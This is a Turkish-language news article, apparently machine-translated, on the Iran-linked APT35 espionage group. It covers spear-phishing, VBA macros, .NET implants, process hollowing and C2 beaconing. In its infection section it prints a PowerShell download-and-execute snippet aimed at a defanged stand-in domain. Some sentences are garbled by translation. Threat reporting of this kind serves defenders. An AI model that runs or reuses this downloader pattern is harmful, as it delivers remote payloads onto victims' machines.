
IRGC bağlantılı APT35 kolektifi, 2010’ların ortalarında ısrarcı bir tehdit aktörü olarak ortaya çıktığından beri, taktiklerini sürekli olarak Orta Doğu ve ötesindeki hükümet kuruluşlarını, enerji firmalarını ve diplomatik misyonları hedef alacak şekilde uyarladı.
Başlangıçta hedefli kimlik avı kampanyaları aracılığıyla kimlik bilgileri toplamaya odaklanan grup, derin ağ sızması ve uzun vadeli casusluk yapabilen modüler bir araç seti geliştirdi.
Operasyonları, eski Office makro güvenlik açıklarından yararlanan, dikkatlice hazırlanmış hedef odaklı kimlik avı mesajlarıyla başlar ve arka kapıların gizlice konuşlandırılmasına zemin hazırlar.
Cloudsek analistleri, APT35’in araç setinin hem özel hem de kamuya açık bileşenleri içerdiğini ve bu sayede araştırmacıların, düşmanlar yükler arasında dönerken bile farklı kod parmak izlerini takip etmelerine olanak tanıdığını belirtti.
İkinci paragraftan sonra Cloudsek araştırmacıları, grubun .NET tabanlı implant kullanımı ile bellek içi yürütme tekniklerine doğru belirgin bir geçiş, disk yapaylıklarının azaltılması ve adli analizin karmaşıklaştırılması arasında bir korelasyon tespit etti.
Bu keşif, ağ savunucuları için özel algılama kurallarının geliştirilmesine yol açtı.
Kampanyanın etkisi önemli oldu: ele geçirilen ağlar, diplomatik iletişim yoluyla veri sızıntısına, fikri mülkiyet hırsızlığına ve devlet düzeyindeki hedeflere göre tasarlanmış stratejik keşiflere maruz kaldı.
APT35’in rastgele C2 işaret aralıkları ve HTTP/HTTPS üzerinden şifrelenmiş kanallar dahil olmak üzere operasyonel güvenlik önlemleri, geleneksel imza tabanlı savunmalardan sürekli olarak kaçındı. Mağdurlar genellikle aylarca riskten habersiz kalıyor, bu da derin veri toplanmasına ve yanal yayılıma olanak tanıyor.
Grubun casusluk operasyonları teknik zanaatın ötesine uzanıyor. APT35 operatörleri, hedeflenen kuruluşlardaki jeopolitik olaylardan ve profesyonel bağlantılardan yararlanarak son derece ikna edici tuzaklar oluşturmak için kapsamlı açık kaynak istihbarat (OSINT) toplama çalışmaları yürütür.
Bu insan merkezli yaklaşım, gelişmiş kötü amaçlı yazılımlarla birleştiğinde, düşmanın uyum sağlama yeteneğinin ve kaynak yatırımının altını çiziyor.
Enfeksiyon Mekanizmasının Derinlemesine İncelemesi
APT35’in birincil enfeksiyon vektörü, aşamalı bir indiriciyi belleğe yüklemek için tasarlanmış karmaşık VBA makroları içeren silahlı Word belgelerinden yararlanır.
Belge açıldığında makro, yasal bir Windows Güncelleme işlemi gibi görünen bir PowerShell komutunu çalıştırır: –
$u = "http://malicious[.]domain/payload.bin"
$r = Invoke-WebRequest -Uri $u -UseBasicParsing
$e = [System.Text.Encoding]::UTF8.GetString($r.Content)
Invoke-Expression $e
Bu indirici, VBA koduna gömülü bir AES anahtarını kullanarak sonraki aşamadaki DLL dosyasının şifresini çözer. Şifresi çözülmüş veri, genellikle .NET olarak derlenmiş bir arka kapıdır. FosforYükleyicikalıcılık için bir COM nesnesi olarak kaydolur.
İçine enjekte etmek için işlem boşluğunu kullanır svchost.exe
aralıklı olarak gizli bir C2 alanına işaret veriyor. Şekil 1, bu enjeksiyon iş akışını, kaçırmak için şifrelenmiş bir kaynak bölümünde saklanan AES anahtarıyla göstermektedir.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.